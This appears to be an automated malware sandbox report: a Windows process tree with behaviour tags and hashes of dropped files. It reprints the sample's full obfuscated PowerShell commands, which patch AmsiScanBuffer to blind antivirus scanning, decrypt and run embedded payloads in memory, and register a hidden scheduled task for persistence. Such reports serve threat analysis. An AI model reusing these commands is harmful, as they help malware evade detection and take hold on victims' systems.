RkoJKGkSxr,$QWHGNWpQFNGlkDnYorNDaN).Invoke($sQvRJscRDuYPdqYbY,[uint32]8,0x20,[ref]$kKzZeCrkMe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JunPHcHNLDHa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KBrXkzePEaAnpL,[Parameter(Position=1)][Type]$HUydoUCImH)$rtLEDBkYAZv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'dD'+[Char](101)+'leg'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+'o'+''+'r'+'yM'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+'e'+[Char](84)+'y'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+',An'+'s'+''+'i'+'C'+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](65)+'ut'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rtLEDBkYAZv.DefineConstructor('R'+[Char](84)+''+'S'+'p'+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'lN'+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+'ide'+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$KBrXkzePEaAnpL).SetImplementationFlags(''+[Char](82)+'u'+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');$rtLEDBkYAZv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+','+'H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+','+''+'N'+''+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vir'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$HUydoUCImH,$KBrXkzePEaAnpL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+'a'+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $rtLEDBkYAZv.CreateType();}$CkgoKCDeQpcSY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+'t'+[Char](101)+'m.d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+'o'+'ft'+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'fe'+'N'+''+[Char](97)+''+[Char](116)+''+'i'+'ve'+'M'+''+[Char](101)+'t'+'h'+'od'+'s'+'');$zHDsgnmfxtfKms=$CkgoKCDeQpcSY.GetMethod(''+[Char](71)+'et'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+'d'+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+'i'+'c,'+[Char](83)+'t'+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gaxSXaamrdWKwnxoXWH=JunPHcHNLDHa @([String])([IntPtr]);$mJoGbaSlOvwWGQSikufVtr=JunPHcHNLDHa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ifvtDwnsGrl=$CkgoKCDeQpcSY.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+'l'+'')));$mmgvmZBiwkqEfG=$zHDsgnmfxtfKms.Invoke($Null,@([Object]$ifvtDwnsGrl,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'y'+'A'+'')));$qxADBplxugvlCzZat=$zHDsgnmfxtfKms.Invoke($Null,@([Object]$ifvtDwnsGrl,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$uxTigoF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mmgvmZBiwkqEfG,$gaxSXaamrdWKwnxoXWH).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$mdXffhKJzZisnNDQl=$zHDsgnmfxtfKms.Invoke($Null,@([Object]$uxTigoF,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'Bu'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$IvnXQYGDxu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxADBplxugvlCzZat,$mJoGbaSlOvwWGQSikufVtr).Invoke($mdXffhKJzZisnNDQl,[uint32]8,4,[ref]$IvnXQYGDxu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mdXffhKJzZisnNDQl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxADBplxugvlCzZat,$mJoGbaSlOvwWGQSikufVtr).Invoke($mdXffhKJzZisnNDQl,[uint32]8,0x20,[ref]$IvnXQYGDxu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2780 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1520
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1548
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2024
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2644
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2112
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3092
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lijgTPA5dhfZJWkNjERvpxoEFfjChwGKxEXCCWF2p4I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ajz4mWMPOPBp4cBpjj4jZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YoWfT=New-Object System.IO.MemoryStream(,$param_var); $tqhnx=New-Object System.IO.MemoryStream; $cKCBi=New-Object System.IO.Compression.GZipStream($YoWfT, [IO.Compression.CompressionMode]::Decompress); $cKCBi.CopyTo($tqhnx); $cKCBi.Dispose(); $YoWfT.Dispose(); $tqhnx.Dispose(); $tqhnx.ToArray();}function execute_function($param_var,$param2_var){ $IFErL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RqXgX=$IFErL.EntryPoint; $RqXgX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yuKlA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($ZdxUX in $yuKlA) { if ($ZdxUX.StartsWith(':: ')) { $qArQO=$ZdxUX.Substring(3); break; }}$payloads_var=[string[]]$qArQO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_745_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_745.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_745.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_745.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lijgTPA5dhfZJWkNjERvpxoEFfjChwGKxEXCCWF2p4I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ajz4mWMPOPBp4cBpjj4jZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YoWfT=New-Object System.IO.MemoryStream(,$param_var); $tqhnx=New-Object System.IO.MemoryStream; $cKCBi=New-Object System.IO.Compression.GZipStream($YoWfT, [IO.Compression.CompressionMode]::Decompress); $cKCBi.CopyTo($tqhnx); $cKCBi.Dispose(); $YoWfT.Dispose(); $tqhnx.Dispose(); $tqhnx.ToArray();}function execute_function($param_var,$param2_var){ $IFErL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RqXgX=$IFErL.EntryPoint; $RqXgX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_745.bat';$yuKlA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_745.bat').Split([Environment]::NewLine);foreach ($ZdxUX in $yuKlA) { if ($ZdxUX.StartsWith(':: ')) { $qArQO=$ZdxUX.Substring(3); break; }}$payloads_var=[string[]]$qArQO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
PID:4512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bHHSUbOTxiN2.bat" "7⤵PID:3596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2460
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵PID:3852
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:1140 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3440
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3888
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3928
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3980
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4312
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2188
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4016
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2220
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1660
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1044
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58ba8fc1034d449222856ea8fa2531e28
SHA17570fe1788e57484c5138b6cead052fbc3366f3e
SHA2562e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA5127ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
Filesize
17KB
MD5787e13bca98baef335f4f8adddbfd673
SHA1046f4851678e512adcff078c0bc05a1782575e98
SHA256bedc02069e2df3e9db7487bd40954278ea1e484ada85a34127084efef0031539
SHA512192e4ac74e32aee1138eb4788b24b8373fcb4ee2f23aaa440509b00820a7d37e44e68107657204d2ca3f0073c717b10f8159833803ad696349a947a304dac5db
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
276B
MD5311f902be84494d9e1de3bd67ccfe381
SHA1fbd84dc890aec36520e0ea6e36d44b3d1d699a33
SHA2563f3da04dbe8a8fdadc2db83e2cdde57db483ce3e707a60b4df4830d1af992c2c
SHA51288938338aae95c4bd6e2412388dbc71b9acd3224f27f94a246eb16de51733ae72bac1bf6e04509a929c98e3636863e0921234c64b9d19d81b67bb62dc778814b
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
224B
MD5f697e4b16440f38fe7d625d398eabe2d
SHA10306fa2e5d12fc08299436daddb53214d4af9ee5
SHA256fd646c5a47e24f451ca98b1963de63be7f95ca54d8117a0b0416376d4d7d83a6
SHA5120c1a650b3abf80d43a909d2560de1b808710618e6a6253c46bc498bc591cc85eed525ea3ba9621da9f13ec77317d922c987da7f55f67f3f3eea36be67f83d2fc
-
Filesize
513KB
MD52f2f86a8f6be8fa6b37bd49bcd660a75
SHA1f7006941a8cbf7a663e9fa379f75ccd5afedd730
SHA2563798ed2ce7d93b63c0e5670d610809c6b73ddf556968b58446ae8b62c027354c
SHA5125f253dd977ff725bab54ddd45bcdbd213587b55a376446a9db2c68bc097e97ad7a61019156449f65e329b9b51f8de3dfa077aa093787fc037d1c5c92252334fb
-
Filesize
115B
MD59d25ecb2f25fe5e186a4fc55287b9a0d
SHA1bba2dcfac9b81d9966f586805c071924154649ca
SHA256f0240da74ef222196d8aa1bd7853354c77ade4c8dd643d784393703dfeb973f9
SHA512416fe316bae1f23b94c75e28ee2a445aa30a5f6e4d4089fbfcfe0bf5e8f4623c74990d816e60ae8cbd1dd3e66759e6a50fbc96d32d0df10594ebbdc16ceaad25
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b